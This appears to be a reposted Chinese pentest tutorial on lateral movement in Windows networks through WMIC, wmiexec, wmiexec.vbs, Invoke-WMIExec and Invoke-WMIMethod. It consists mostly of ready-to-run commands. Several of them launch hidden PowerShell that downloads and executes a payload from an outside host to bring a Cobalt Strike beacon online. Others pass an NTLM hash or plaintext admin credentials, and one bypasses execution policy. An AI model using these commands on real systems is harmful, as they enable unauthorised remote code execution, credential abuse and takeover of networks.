WMIC遠程執行命令橫向移動
目錄- WMIC遠程執行命令橫向移動
- 一、wmic介紹
- 二、wmic常用命令
- 三、wmic配合powershell上線CS
- 四、Wmiexec配合powershell上線CS
- 五、wmiexec.vbs配合powershell上線CS
- 六、Invoke-WMIExec.ps1配合powershell上線CS
- 七、Invoke-WMIMethod.ps1上線CS
一、wmic介紹
wmic擴展wmi(Windows Management Instrumentation,Windows管理工具) ,提供了從命令列介面和批處理腳本執行系統管理的支持,
wmic命令需要本地管理員或域管理員才可以進行正常使用,普通權限用戶若想要使用wmi,可以修改普通用戶的ACL,不過修改用戶的ACL也需要管理員權限,普通用戶使用wmic,
二、wmic常用命令
wmic logon list brief 登錄?戶
wmic ntdomain list brief 域控機器
wmic useraccount list brief ?戶串列
wmic share get name,path 查看系統共享
wmic service list brief |more 服務串列
wmic startup list full 識別開機啟動的程式,包括路徑
wmic呼叫cmd
執行命令并且輸出
wmic /node:IP地址 /user:本地用戶管理員/域管理員 /password:密碼 process call create "cmd.exe /c ipconfig >c:\ip.txt"
列出遠程主機行程
wmic /node:IP地址 /user:本地用戶管理員/域管理員 /password:密碼 process list brief
在遠程系統上執行bat腳本
wmic /node:IP地址 /user:本地用戶管理員/域管理員 /password:密碼 process call create c:\programdata\test.bat
執行powershell上線
wmic /node:IP地址 /user:本地用戶管理員/域管理員 /password:密碼 process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('ps腳本地址'))\""
三、wmic配合powershell上線CS
1、使用cs生成powershell腳本
shell whoami /all
2、wmic進行上線,用http服務下載payload.ps1
shell wmic /node:192.168.142.10 /user:administrator /password:admin@123 PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))\""
3、等待上線
四、Wmiexec配合powershell上線CS
wmiexec是一個即有全互動也有半互動的遠程命令執行工具,有python版本的pe版本可運用于多種環 境,包括webshell環境、rdp環境、socks環境等
1、使用賬號密碼登錄進行powershell上線
wmiexec.exe administrator:admin@[email protected] "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))"
2、使用hash上線
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 [email protected] "powershell.exe -nop -w hidden -c IEX ((new-object
net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))"
五、wmiexec.vbs配合powershell上線CS
wmiexec.vbs腳本通過VBS呼叫WMI來模擬PsExec的功能,其可以在遠程系統中執行命令并進行回顯, 獲取遠程主機的半互動式Shell,wmiexec.vbs支持兩種模式,一種是半互動式shell模式,另一種是執行單條命令模式,用法如下:
cscript.exe //nologo wmiexec.vbs /cmd IP 用戶 密碼 "命令"
1、使用賬號密碼登錄進行powershell上線
cscript.exe //nologo wmiexec.vbs /cmd 192.168.142.10 administrator admin@123 "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))"
六、Invoke-WMIExec.ps1配合powershell上線CS
Invoke-WMIExec是一個powershell腳本在Invoke-TheHash的檔案中,用法如下:
Invoke-WMIExec -Target IP -Domain 域 -Username 用戶 -Hash hash -Command "calc.exe" -verbose
1、采用遠程無檔案落地的方式(未成功)
shell powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.142.1/Invoke-WMIExec.ps1');import-module .\Invoke-WMIExec.ps1;Invoke-WMIExec -Target 192.168.142.10 -Username administrator -Hash 579da618cfbfa85247acf1f800a280a4 -Command "powershell.exe -nop -WarningVariable hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))" -verbose
2、CS匯入powershell腳本
(1)匯入腳本
powershell-import powershell/Invoke-WMIExec.ps1
(2)運行上線命令
powershell Invoke-WMIExec -Target 192.168.142.10 -Username administrator -Hash 579da618cfbfa85247acf1f800a280a4 -Command "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))" -verbose
七、Invoke-WMIMethod.ps1上線CS
注意:需要用到遠程桌面,
該模塊為Powershell內置模塊,以下為示例,可以自由組合命令進行測驗,
$User = "administrator"
$Password= ConvertTo-SecureString -String "admin@123" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User , $Password
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "powershell.exe
-nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))" -ComputerName "192.168.142.10" -Credential $Cred
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554968.html
標籤:其他
下一篇:返回列表